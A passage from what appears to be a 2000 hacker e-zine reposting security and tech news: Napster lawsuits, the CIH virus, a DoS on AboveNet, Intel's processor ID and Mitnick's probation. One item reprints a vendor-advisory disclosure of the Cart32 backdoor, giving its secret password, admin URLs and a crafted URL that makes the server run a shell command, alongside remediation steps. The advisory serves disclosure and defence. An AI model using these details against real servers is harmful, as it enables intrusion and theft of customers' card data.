It also deems electronic documents as legally binding and acceptable in
place of paper. Checks and bills, powers of attorney, trusts, wills, and
contracts of sale of immovable property, however, will not be accepted in
a digital format.
Computer crimes recognized under the proposed law would affect hackers,
and those who are not authorized to enter a system to download data,
introduce viruses, damage data or the system, block access to authorized
users, or even assist another person in contravening the law.
Publishing electronic information that is considered obscene, tampering
with computer source documents, breaching confidentiality, publishing
false digital certificates, and failing to furnish information or tax
returns also would be a violation of the law.
If passed, the law would apply to anyone in or outside of India who
tampers with a computer located in India.
Contrary to other Indian laws, such as the Code of Criminal Procedure of
1973, additional powers have been given to the police to tackle
cybercrime. Any senior police officer can enter and search any public
place on suspicion without a warrant.
Those guilty of securing access to the system without authorization could
be fined up to 1 million rupees. Payment of damages would be made to the
person affected.
There are critics, of course.
Some say the software sector has flourished in India precisely because of
a lack of regulation. So while the framework for accepting electronic
documents is welcome, businessmen say the government should stay out of
trying to regulate much of the rest.
Senior Indian government officials, however, point to some shocking cases,
arguing that there's a need to regulate the cyberjungle.
They cite cases where a popular Hindi film actress was depicted nude on
the Internet using altered graphics. They also point to prominent cases of
cybersquatting, where some small firms allegedly tried to snatch the trade
names of huge newspapers.
"We had no remedies in such cases. Night and day, hackers are taking on
portals, too," said Gulshan Rai, the Ministry of Information Technology's
senior director.
Some Indian sites have also been the victims of hacking,� especially after
last year's federally-sanctioned nuclear tests in Rajasthan, near the
Indo-Pakistan border.
Rai said the IT bill would take care of issues of "authentication,
origination, jurisdiction and attribution." In some cases of criminalized
cyber-behavior, the liability would be civil. But repeated and more severe
cases would be treated as criminal liability, Rai said.
E-commerce transactions are leading to ludicrous situations in taxation,
said India's IT task force member Montek S. Ahluwalia. Music sold
internationally on cassette tapes is being taxed, but the same music sold
in digital format is not; services sold over the Net internationally are
not taxed, while those sold within the country are, Ahluwalia said.
Rai said the cyber-surveillance and interceptions provisions of the new IT
bill would require those offering over 2MB of bandwidth to give access to
traffic to agencies like the Intelligence Bureau and Central Bureau of
Investigation.
There are other laws already in place relating to cybercrimes.
"Just because you're on the Internet doesn't put you above national laws.
Pornography and gambling is prohibited under the Indian Penal Code of
1860, advertisement regulations apply, and you can get hauled up for
defamation, libel or slander," said Annapurna Ogoti, of the law firm
Nishit Desai Associates.
@HWA
114.0 [HNN] Napster Backs 'Bizkit
~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by The Hex
Limp Bizkit has taken on controversial Napster as a sponsor of its
free summer concert tour. The groups lead singer said that Napster was
all about getting his art to the people and criticized people who
chose to try and stop that.
Wired
http://www.wired.com/news/business/0,1367,35881,00.html
@HWA
115.0 [HNN] Dr. Dre Sues Students for Napster Use
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root
Rap artists Dr. Dre has filed suit against five universities and
students for violating copyright laws by using Napster. the lawsuit
did not specifically name any students or schools it left them open to
be named later. The lawsuit seeks $100,000 per illegally copied work.
In an unrelated story Dr. Dre has been sued by LucasFilm for using the
trademark THX sound at the beginning of his album, even after being
denied permission. (I guess it is Ok to steal other peoples work as
long as they don't steal yours.)
C|Net
http://news.cnet.com/news/0-1005-200-1760313.html?tag
Rap artist sues Napster, students By John Borland Staff Writer, CNET
News.com April 25, 2000, 5:00 p.m. PT Rap artist Dr. Dre sued MP3-swapping
firm Napster today, adding a new layer of legal woes to the already
besieged company.
But this time, the stakes are being raised: Dr. Dre also is targeting
students at universities who are using the Napster software to download
MP3 files, putting individual music listeners into the legal line of fire.
It's the second lawsuit filed by musicians who say the controversial
software is responsible for massive violations of their copyrights. Heavy
metal band Metallica also is seeking to close Napster's digital doors.
Dr. Dre demanded last week that Napster remove his work from its service.
But the company refused, saying it could only remove individual users
identified as copyright violators.
In response, the artist is asking that the court shut down Napster and
award damages of $100,000 per illegally copied work. That could amount to
close to $10 million, according to the lawsuit.
"Napster devised and distributes software whose sole purpose is to permit
(the company) to profit by abetting and encouraging the pirating of the
creative efforts of the world's most admired and successful musical
artists," the suit reads.
The young company, started last year by 19-year-old student Shawn Fanning,
has thrown the music industry into a kind of panic. Fanning's software
allows people to link their computers directly to each other to share
their music collections without paying companies or artists for the songs.
At any time, thousands of people are online, sharing hundreds of thousands
of songs through Napster's directory.
The Recording Industry Association of America (RIAA) was the first to take
legal action, suing Napster late last year. Metallica joined this month
but set its legal sights on three universities it said were responsible
for their students' illegal use of the software.
But Dr. Dre, whose real name is Andre Young, also trains the specter of
legal responsibility directly on the students themselves.
No individual students or universities were named in the version of Dr.
Dre's suit filed today. Instead, it is serving as a kind of placeholder,
noting that five schools and students will be named later.
That could serve as an effective scare tactic, based on events of the past
week. Already the three universities named in Metallica's lawsuits have
blocked or sharply restricted use of Napster on their campuses. The threat
of any other school or student being added to this new lawsuit could push
other universities in the same direction and dissuade students from using
the service.
Dr. Dre himself released a terse explanation for his legal action. "I
don't like people stealing my music," he said in a press release today.
In a coincidence of the courts, Dr. Dre himself was sued for copyright
infringement last week. George Lucas' LucasFilm contends that the artist
used the trademarked THX sound, which appears before many movies, to open
his most recent album, even after being denied permission.
Dr. Dre's suit was filed in a Los Angeles federal court.
(Dr. Dre fuck you, and fuck Metallica, quit listening to your lawyers and
go hunt the real pirates, like buy a clue. - Ed )
@HWA
116.0 [HNN] Chernobyl Hits South Korea
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by root
the Ministry of Information and Communication in South Korea has
reported that it has received almost 2,000 complaints regarding the
Chernobyl or CIH virus. last year CIH infected almost 300,000 systems
in the country.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2555878,00.html?chkpt
Chernobyl virus nukes S. Korean PCs
Thousands of small businesses and personal users had their hard drives
cleaned out by the infamous CIH virus.
By Reuters April 26, 2000 7:02 AM PT
SEOUL -- The so-called Chernobyl computer virus struck South Korea on
Wednesday, wiping out hard disks at hundreds of companies, the Ministry of
Information and Communication said on Wednesday. The ministry
reported it received almost 2,000 complaints about the virus, which struck
on the 14th anniversary of the Chernobyl nuclear accident in the Ukraine.
A ministry official said far worse damage was caused last year.
"In 1999, the outbreak of the virus affected up to 300,000 computers, and
larger companies took the brunt of the damage,'' said the official. ``This
time, it's likely to be 5 percent of that.''
He said individuals and small companies accounted for more than 70 percent
of the complaints reported on Wednesday.
He gave no estimate of the value of the damage caused by the virus erasing
data on hard disk drives and corrupting communications software.
@HWA
117.0 [HNN] Russian Gas Supplier Invaded by Cyber Criminals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23 and William Knowles
Gazprom, a huge state-run gas monopoly, was one of many targets hit by
cyber criminals last year in Russia, officials have said. Acting with
an employee at the company the criminals were able to bypass the
company's security and gained access to the gas control systems. The
report also registered 852 cases of computer crime in Russia in 1999,
up twelve-fold from the year before. (This story sounds more like a
convenient way to place blame on hackers over likely Russian
mismanagement or corruption.)
Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500197283-500270387-501418162-0,00.html
Deceased Url
@HWA
118.0 [HNN] G8 Plans Cyber Security Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by root66
The Group of Eight major industrialized nations will hold a conference
in Paris next month about how governments and companies should
interact when confronted with cybercrime. The May 15-17 conference
will be attended by representatives of 150 major private firms
alongside delegations from G-8 states Italy, France, Britain, Germany,
Japan, Russia, Canada and the United States. The conference's aim was
to study the challenges to security and consumer confidence posed by
new information and communication technologies.
Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/internet/docs/467487l.htm
Url died
@HWA
119.0 [HNN] Cyber Crime Institute Established
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23
Carnegie Mellon University has created a research institute this month
dedicated prevention rather than response. (Yeah!) The Carnegie Mellon
Institute for Survivable Systems will work with both the public and
private sector and will use resources and people from the CERT
coordination center.
CNN
http://www.cnn.com/2000/TECH/computing/04/26/cybersecurity/index.html
Carnegie Mellon establishes anti-hacking institute
April 26, 2000 Web posted at: 5:16 p.m. EDT (2116 GMT)
By Richard Stenger CNN Interactive Writer
PITTSBURGH, Pennsylvania (CNN) -- A Pennsylvania university created a
research institute this month dedicated to fighting computer attacks like
those that besieged major Web sites like eBay, Yahoo! and CNN.com in
February.
Unlike other computer network security R&D centers, the Carnegie Mellon
Institute for Survivable Systems will solicit private as well as federal
funds and concentrate on prevention rather than response, according to
CMISS officers.
The new research group, which will seek partnerships and fee-for-service
arrangements with the public and private sectors, will draw resources and
personnel from other Carnegie University facilities, in particular from
the CERT Coordination Center.
But unlike the CERT center, CMISS will not have restrictive limits on
corporate money. The CERT center receives most of its money from U.S.
agencies like the Department of Defense, the FBI and the IRS.
And the federal government sets strict limits for private investment in
the center, said Bill Pollack, a spokesman for CMU's Software Engineering
Institute, the parent department of CERT and CMISS.
"There's a limit on growth because of that. CMISS enables the Carnegie
Mellon community to get all kinds of funding," Pollack said.
CMISS hopes eventually to have an annual operating budget of $40 million,
in large part funded by the private sector, he said.
E-commerce businesses could be receptive to CMISS' research, considering
sporadic attacks from an average teenager can cost them billions of
dollars.
"There hasn't been a good foundation of data available to help researchers
understand the key factors that contribute to actual losses," said CMU
Computer Science Dean James Morris, in a statement.
The CERT center was created after the Morris Worm incident crippled about
10 percent of all computers on the Internet in 1988. Since then dozens of
computer emergency response teams have sprung up, but they tend to focus
on hacking breaches after the fact, according to CMISS. The new institute
will try to solve network security problems before they have a broad
impact.
"Information assurance, as it's practiced today, is not a science. It
remains largely ad hoc," said CMU Engineering Dean John Anderson, in a
statement.
CMISS has already earned praise from Sen. Rick Santorum of Pennsylvania.
"Carnegie Mellon's ... effort will, for the first time, establish a
public-private partnership that will help safeguard our national
security," Santorum said in a statement. He chairs the U.S. Senate's task
force on cybersecurity.
@HWA
120.0 [HNN] Domain Lock Down Launched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23
Domain registrar Register.com Inc. Wednesday launched Domain Lock
Down, a service that protects domain names from being hijacked. New
service will be able to "locks" names at the registry level, which
helps prevent unauthorized alterations to name server and registrar
information and blocks deletions of a domain name for the length of
the registration term.
Internet News
http://www.internetnews.com/bus-news/article/0,2171,3_348071,00.html
Register.com Launches Domain Security Service By Carol King
Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a
service that protects domain names from being hijacked.
With the new service, register.com (RCOM), "locks" names at the registry
level, which helps prevent unauthorized alterations to name server and
registrar information and blocks deletions of a domain name for the length
of the registration term.
As a result, customers using the service have greater security over their
domain names and can reduce the risk of illegal tampering. The service
costs $99 per name.
In light of the recent hijacking incidences, register.com felt it was
essential to provide customers' with peace of mind, according to Richard
Forman, the company's president and chief executive officer.
"Because a domain name is the key access point to the Internet, businesses
cannot afford to suffer the effects of illegal domain tampering," he says.
"By locking down a domain, register.com corporate services customers
increase the security of their business."
@HWA
121.0 [HNN] Backdoor Found in Shopping Cart Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by root66
Cerberus Information Security has found a secret password that allows
someone connecting to a web site running "Cart32" shopping cart
software to gain access to the server. The backdoor could reveal such
data as credit card numbers, order information, and shipping
addresses. McMurtrey-Whitaker which sells cart32 said that they will
have a patch available next week. @Stake L0pht labs has issued its own
fix for users who can not wait that long.
Cerberus-infosec
@Stake L0pht Labs
Wired
ZD Net
http://www.cerberus-infosec.co.uk/advcart32.html
http://www.l0pht.com/
http://www.wired.com/news/politics/0,1283,35954,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2556876,00.html
Cerberus Information Security Advisory (CISADV000427)
http://www.cerberus-infosec.co.uk/advisories.shtml
Released : 27th April 2000
Name : Cart32 secret password Backdoor
Affected Systems : Any Win32 based web server using Cart32
Issue : Attackers can run arbitary commands on the web
server
and/or gain access to credit card information.
Authors : David Litchfield (mnemonix@globalnet.co.uk) and
Mark Litchfield (xor-syst@devilnet.co.uk)
Description
***********
The Cerberus Security Team has discovered a serious security hole in
McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart,
namely, Cart32 (http://www.cart32.com/) that can only be described as a
blatant backdoor. Within cart32.exe, the main file that provides the cart's
functionality, there is a secret hidden password that can be used to gain
vital information such as other passwords and using these an attacker can
modify the shopping cart's properties so that arbitary commands may be run
on the server as well as gain access to customers' credit card details,
shipping addresses and other highly sensitive information.
Details
*******
Within cart32.exe there is a secret backdoor password of "wemilo" (found at
file offset 0x6204h) known internally as the Cart32Password. With knowledge
of this password an attacker can go to one of several undocument URLs such
as http://charon/scripts/cart32.exe/cart32clientlist and obtain a list the
passwords for each Cart32 client. (A client is essentially a shop site).
Although these passwords appear to be hashed they can still be used. For
example they can be embedded in a specially crafted URL that will allow the
attacker to prime the server to run an arbitrary command when an order is
confirmed:
http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab
&SaveTab=Cart32%2B&Client=foobar
&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabT
oSave=Cart32%2B&PlusTabToSave=
Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile
.txt
This URL will set the cart's properties to spawn a shell, perform a
directory listing and pipe the output to a file called file.txt on the root
of the C: drive when an order is confirmed. After doing this the attacker
would then create a spurious order and confirm it thus executing the
command. (Please note that the above URL is pertinent only to an internal
Cerberus server - password details and client info would need to be changed
to reflect the site in question).
Further to this the Cerberus Security Team has found what is, perhaps, a
second backdoor. By going directly to the following URL
http://charon/scripts/c32web.exe/ChangeAdminPassword it is possible to
change the administrative password with out knowledge of the previous one.
Solution
********
Cerberus recommends that the following steps be actioned immediately.
Cerberus has tested this in their labs and the Cart functionality will not
be broken by following these steps.
1) Download a Hex Editor such as UltraEdit (http://www.ultraedit.com) and
edit cart32.exe changing the "wemilo" password to something else. This will
address the first issue.
2) Because c32web.exe is the administration program for Cart32 only site
administrators will need access to it. Set the NTFS permissions on this file
so that only Administrators have access to it. This way anyone attempting to
access this file to change the admin password will be prompted for an NT
account and password. For other "servers" such as Windows 95 and 98 Cerberus
recommends removing this file.
Cerberus vulnerability scanner, CIS, has been updated to include checks for
these issues and is available for free download from their website
http://www.cerberus-infosec.com/
Vendor Status
*************
Due to the severity and seriousness of this issue Cerberus, has taken the
rare step of making this information publicly available before the vendor
has provided a patch. This is not normally Cerberus policy, however, as we
have provided fix/workaround information in this advisory we belive we are
not putting customers at any risk they would not have otherwise been exposed
to.
About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.com
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilites leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 60 to date, making them a clear leader of companies offering
such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serves customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0) 208 395 4980
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
@HWA
122.0 [HNN] FBI Investigating AboveNet DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by root66
The FBI is investigating a denial of service attack that hit San
Jose-based AboveNet Communications Inc. on Tuesday. According to
AboveNet the attack was directed at a network device called a customer
aggregation switch. The problem lies within AboveNet's methodologies
as opposed to a vulnerability within the switch said a representative
of AboveNet.
ComputerWorld
http://www.computerworld.com/home/print.nsf/(frames)/000427D962?OpenDocument&~f
FBI investigates cyberattack against AboveNet
By Ann Harrison 04/27/2000 As investigators continue to search for
attackers who temporarily shut down eight e-commerce sites in February,
another company was hit by a different type of denial-of-service attack
Tuesday.
The FBI is investigating a denial-of-service attack launched against San
Jose-based AboveNet Communications Inc. that blocked traffic to almost a
thousand content and service providers.
FBI spokeswoman Deb Weierman said the bureau is looking into the AboveNet
incident "to see what activity went on." However, she added that because
it is an ongoing case, she couldn't divulge any details about the
investigation.
Unlike the earlier distributed denial-of-service attacks that flooded
e-commerce sites with false data traffic, this attack was directed against
a switch in AboveNet's network. AboveNet's Internet Service Exchange (ISX)
network provides co-location services and Internet connectivity to
companies such as NetZero Inc., CNet Inc. and America Online Inc., which
wasn't affected by the outage.
"This wasn't just a teen-ager with a $300 Linux machine. This was someone
who had time to learn the trade," said Paul Vixie, senior vice president
of Internet services at Metromedia Fiber Network Inc. in White Plains,
N.Y., AboveNet's parent company. "It was certainly severe; most of our
customers were impacted for a period of hours."
According to Vixie, the attack was directed at a network device called a
customer aggregation switch. The switch bundles co-location customers at
the company's ISX facilities and links them to an Internet backbone as one
high-speed connection. Vixie said the attack hit three switches at the
company's ISX facilities in New York, Vienna, Va., and San Jose.
The switch is made by Cisco Systems Inc., but Vixie said the exploit had
nothing to do with a defect in the switch. He said the attacker exploited
a flaw in the switch's configuration management process that the company
has since changed.
"There are certainly good and bad ways to do that. We thought we were
using a good way, and (this week) we found out that we weren't," said
Vixie. "The hole closed was in the process, not in the product."
Stephen Northcutt, director of the Global Incident Analysis Center for the
SANS Institute, declined to comment on the specifics of the AboveNet case.
But he said the real problem isn't the attacks but what can be done about
them. "We're focusing on the wrong thing," Northcutt said. "We're focusing
on the actual attack. What we need to focus on are the systems that are
being compromised every day."
Vixie said he believes there is little opportunity for copycat attacks
because of the unique methods AboveNet used to manage its network. The
company suffered rolling outages from mid-morning Pacific time on Tuesday
to mid-afternoon. According to Vixie, many customers had alternative
carriers that ensured their network traffic got through � a common
fail-over strategy for high-end customers. Very large customers, such as
AOL, whose traffic wasn't funneled through the aggregation switch, weren't
impacted.
Vixie advised other information technology mangers who may be concerned
with the management of their switches to consult with their vendors on
proper switch management and configuration. He said swift action is also
needed to deflect such attacks. Close network monitoring revealed the
connectivity loss to customers, and AboveNet launched an investigation
immediately. "We used brute force," said Vixie. "We called everyone in on
the shift and went through the network with a fine-tooth comb, not only to
get everyone back up online, but to make sure there were no time bombs."
He added that no backdoors or other delayed exploits were detected.
Vixie says the company has speculated widely as to the motive for the
attack and concluded that it could have emerged from one of two
"completely useless categories." One category includes competitors that
the company took a customer away from, disgruntled former employees or
customers who had been disconnected because they were spamming. The other
category, said Vixie, includes "someone who has something to prove and
wants to bring our network down and wants to brag about it."
The denial-of-service attacks launched in February have proved difficult
to trace because of the sheer volume of the attacks and the fact that
targeted sites weren't able to capture attack data during the incident.
But Vixie said the FBI has a reasonable chance of catching his company's
attacker, partly because AboveNet has put resources into filtering,
logging and traffic analysis. "We did not come away from (Tuesday's)
experience completely ignorant," said Vixie.
The February attacks against eight large e-commerce sites appeared to
involve known attack tools such as Tribe Flood Network and Trinoo, which
use co-opted machines to send a storm of packets against targeted sites
(see story). Vixie said that because of the ongoing investigation, he
couldn't say whether known exploits were used in the AboveNet attack.
A 15-year-old Canadian, who allegedly calls himself Mafiaboy, was arrested
April 15 by the Royal Canadian Mounted Police and charged in connection
with a February denial-of-service attack against the CNN Web site. He was
charged with two counts of mischief to data, but security analysts believe
he likely wasn't responsible for the other attacks (see story). An
investigation is ongoing, but no other suspects have yet been named.
Brian Sullivan contributed to this story.
@HWA
123.0 [HNN] Intel Removes ID Feature From New Chips
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by Evil Wench
Intel has decided to remove the controversial ID-tracking technology
from its next generation PC processor. The ID was included in Pentium
III chips as a way to help facilitate e-commerce solutions. Intel says
the increase in the technology of digital signatures lead them to this
decision. (Yeah, the bad press and the boycott had nothing to do with
it.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2556671,00.html?chkpt
Intel disables ID tracking in new chips
There was a firestorm of protest when Intel put ID-tracking technology in
Pentium III chips. Now it's obsolete and being removed.
By Robert Lemos, ZDNet News April 27, 2000 12:40 PM PT
Intel Corp. says it plans to remove the controversial processor-ID
technology from its next-generation PC processor and from future
processors, ending a year-long battle with privacy advocates over the
invasive technology. "We made the decision earlier this year," said
George Alfs, a spokesman for Intel (Nasdaq: INTC) said Thursday. "We are
not planning for (the chip ID) in our next processor."
Alfs said the rise of digital-signature technology has made the need for
chip IDs obsolete.
As first reported on ZDNet News more than a year ago, the inclusion of the
chip ID in the Pentium III processor touched off a heated controversy with
privacy advocates denouncing the technology as an attempt to track users
on the Internet.
Calls for boycott Originally, Intel intended to ask PC makers to
ship machines with the processor ID "on" -- that is, accessible to
software -- but later changed tack by supplying a utility to customers to
turn the feature on and off. Still not satisfied, however, privacy
advocates and policy analysts called for a boycott of the chip maker.
The boycott may have gone a long way to decide the issue, said Jason
Catlett, president of pro-privacy Junkbusters Corp. "The thing that I am
very glad didn't happen was for the feature to go into the food chain of
the operating system, browser and e-commerce sites. The boycott probably
cut off a lot of the proliferation that could have happened."
Intel, however, said privacy arguments were less of a factor in the
decision than digital-signature technology. "The technology has moved
quite quickly," Alfs said. "With digital signatures you can do a lot of
the functions that we had envisioned doing with the processor serial
number." Its uses could have included authenticating customers for
e-commerce, secure network management and secure e-mail.
Security features panned However, some security experts and privacy
advocates said the chip could not really add such security features at
all.
"Unfortunately, it doesn't do any of these things," wrote Bruce Schneier,
president of Counterpane Internet Security Inc. in a ZDNet column. "If a
remote Web site queries a processor ID, it has no way of knowing whether
the number it gets back is a real ID or a forged ID."
Intel won't stop adding security features, however. Its current
motherboard chip sets include a random-number generator, which helps
strengthen software encryption on the PC. That will stay, Alfs said.
Don't look for any more boycotts, however. Privacy proponents love
stronger encryption.
@HWA
124.0 [HNN] Another HotMail Hole Patched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by William Knowles
Microsoft has patched yet another HotMail hole. This one used
JavaScript to launch fraudulent password entry screens to trick people
into entering their passwords to their accounts.
C|Net
http://news.cnet.com/news/0-1005-200-1772642.html?tag
Microsoft zaps Hotmail password bug By Paul Festa Staff Writer, CNET
News.com April 27, 2000, 12:30 p.m. PT Microsoft has patched a Hotmail bug
that left users of the Web-based email service vulnerable to a
password-stealing trick.
The exploit was the latest in a series devised by bug hunters using
JavaScript to launch fraudulent password
entry screens to trick people into handing over control of their accounts.
JavaScript is a Web scripting language designed to take actions on a Web
site visitor's computer, such as launching a new window or scrolling text
across the screen, without the visitor's interaction. After the first few
password-stealing schemes came to light, Hotmail and other Web email
providers decided to filter JavaScript from incoming messages.
But bug hunters have kept themselves busy finding ways to sneak the code
around Hotmail's filters.
In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi
Guninski demonstrated a way to inject JavaScript through a style tag. The
exploit worked only with Microsoft's Internet Explorer browser.
In response to news of the bug, Microsoft this week patched the Hotmail
servers.
@HWA
125.0 [HNN] Iron Feather Collection at Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by ifj
On April 23rd, Iron Feather and his wife Hanna Banana were fined at a
I-80 weigh station for transporting over 7,000 pounds of underground
zines. The weight of the printed material, the largest collection of
underground magazines in the world, caused their truck to be severely
overweight. Iron Feather & Hanna were detained until a $300 penalty
could be paid and the 7,000 pounds could be off loaded. Since their
collection is considered one of the nation's top archive of
underground zines they hope to retrieve the impounded storage from
Nebraska this summer. Iron Feather said, "Even thou we lost our
savings on fines and we had to store the huge collection of
underground publications at a Nebraska locker we will not let them or
anyone impair our mission, to preserve & report on the cybertekpunk
cultures."
Iron Feather Journal
http://ironfeather.com
@HWA
126.0 [HNN] Rubicon This Weekend, H2K Announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by RijiLV and macki
The con in MotorCity, Rubicon will be taking place this weekend. They
will be having speakers such as Richard Thieme, Tim Crothers, TDYC!,
Peter Stephenson and others.
Rubi-con
H2K KEYNOTE SPEAKER
Hope2000 has announced that their keynote speaker will be Jello
Biafra, former lead singer of the Dead Kennedys and currently with
Lard. Over the years, Jello has become an outspoken critic of
censorship and the mass stupidity that embraces our culture. It's a
world those in the hacker community are quite familiar with. The
keynote is scheduled for Saturday, July 15 at noon. H2K will run from
July 14-16, 2000.
Hope 2000
HNN Cons Page
http://www.rubi-con.org
http://www.h2k.net
@HWA
127.0 [HNN] Laptop Issues Justice in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by Zorro
A Visual Basic software program known as 'Electronic Judge' is being
used on the streets of Brazil to assist in dispensing justice. The
software is installed on a laptop carried by a real judge who can then
use the software to help asses the situation and even issue sentences
on the spot. The software is currently being tested by three judges in
Espirito Santo in Brazil.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_726000/726837.stm
Wednesday, 26 April, 2000, 18:02 GMT 19:02 UK Laptop is cyber judge and
jury
Brazilian police at a protest
An artificial-intelligence program called the Electronic Judge is
dispensing justice on the mean streets of Brazilian cities. The
program is installed on a laptop carried by a roaming human judge and
helps to assess swiftly and methodically witness reports and forensic
evidence at the scene of an incident. It then issues on-the-spot fines and
can even recommend jail sentences.
I know that this is a little bit different, but it works
Judge Pedro Valls Feu Rosa The software is being tested by three
judges in the state of Espirito Santo. It is part of a scheme called
Justice-on-Wheels, which is designed to speed up Brazil's overloaded legal
system by dealing immediately with straightforward cases.
Most people are happy to have the matters sorted out on the spot, says the
program's creator, Judge Pedro Valls Feu Rosa, who sits in the state's
Supreme Court of Appeals. He adds that the idea is not to replace judges
but to make them more efficient.
Pure logic
After police alert the rapid justice team to minor accidents, they can be
on the scene within 10 minutes. Most cases require only simple questions
and no interpretation of the law - the decision-making process is purely
logical, Judge Feu Rosa claims in New Scientist magazine.
The program, written in the Visual Basic language, presents the judge with
multiple choice questions, such as "Did the driver stop at the red light?"
or "Had the driver been drinking alcohol above the acceptable limit of the
law?"
The Electronic Judge asks questions . . .
These sorts of questions need only yes or no answers, says Judge Feu Rosa:
"If we are concerned with nothing more than pure logic, then why not give
the task to a computer?" He notes that the program gives more than a
simple judgement: it also prints out its reasoning. If the human judge
disagrees with the decision it can simply be overruled.
He admits, however, that some people who have been judged by the program
do not realise that they have been tried by software.
. . . . and then delivers judgement.
It could be some time before a similar system takes the place of an
English court. "It would have to satisfy the authorities that it was
absolutely foolproof first," says a spokesman for the Lord Chancellor's
office, which oversees courts in England and Wales. But it could be
put to use in the US, where Judge Feu Rosa says he is in discussion with
insurance companies to set up a mobile system to resolve disputes over
traffic accidents.
@HWA
128.0 [HNN] CCPA and ECPA not Applicable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by project3
Kevin Giger of Highland, Illinois, was charged in Madison County
Circuit Court this week with computer tampering. Giger is accused of
altering the Web site of the Holiday Inn Express in Highland. Giger's
bail has been set at $15,000. The interesting part of this case is the
courts orders to the cable company which provided Internet access for
Mr. Giger. It is hard to interpret the legalese but it would seem that
the court in this case felt that the Electronic Communications Privacy
Act," 18 U.S.C. 2703 and the "Cable Communications Policy Act," 47
U.S.C. 551 for some reason did not apply.
Highland
Third Judicial Circuit Madison County, Illinois
http://dreamwater.com/highland/
http://www.dreamwater.com/highland/order.htm
@HWA
129.0 [HNN] McAfee Redefines Trojan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by medic
A Trojan or Trojan Horse has traditionaly been a piece of software
that executes malicious code while looking benign. Now a denial of
service tool has been labeled a 'Trojan virus' by McAfee. While the
software in question can potentially be malicious that is its intended
purpose, it is not trying to hide anything. This willful morphing of
definitions by vendors makes it a little difficult for the rest of us.
NAI
http://vil.nai.com/villib/dispvirus.asp?virus_k
@HWA
130.0 [HNN] Mitnick Back in Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 1st
contributed by Macki
The federal probation department has notified Kevin Mitnick's
probation officer that Kevin can no longer give lectures relating to
technology issues. Kevin feels that this is a direct violation of his
first amendment rights. The Associated Press has quoted a figure of
$20,000 worth of speaking engagements scheduled through August.
Mitnick and his lawyer, Los Angeles criminal defense lawyer Sherman
Ellison, will attempt to convince Judge Pfaelzer that Kevin should be
allowed to speak.
Associated Press
Security Focus
C|Net - Interview with Mitnick Regarding this latest government tactic
http://dailynews.yahoo.com/h/ap/20000428/tc/computer_hacker_1.html
http://www.securityfocus.com/news/23
http://news.cnet.com/news/0-1005-200-1781398.html?tag
Mitnick Muzzled Ex-hacker plans his return to court after his ban on
computing is extended to speaking and writing. By Kevin Poulsen April 25,
2000 2:13 AM PT
Kevin Mitnick has been yanked off the lecture circuit and ordered by the
U.S. Probation Office to halt his professional writing efforts, a move
that left a recent Salt Lake City computer conference without its star
speaker, and magazine publisher Steven Brill short one media critic for
his upcoming web offering.
"In regards to the numerous requests you have received concerning writing
and critiquing articles and speaking at conferences, we find it necessary
to deny your participation and recommend that you pursue employment in a
non-related field," reads an April 12th letter to Mitnick from the
Ventura, California U.S. Probation Office that supervises him.
"Right now, I've retained counsel to go ahead and try to get this
clarified," Mitnick said Monday. "I'm surprised, because all I was trying
to do through my writing and speaking was to tell people how information
security is important."
Mitnick is arguably the world's most well-known hacker. His current
notoriety came after he cracked a string of computers at cell phone
companies, universities and ISPs. He pleaded guilty in March, 1999 to
seven felonies, and was released from prison on January 21st, 2000 after
nearly five years in custody.
In February, Mitnick testified before a Senate committee about U.S.
government computer security. The same month, he wrote a five-hundred-word
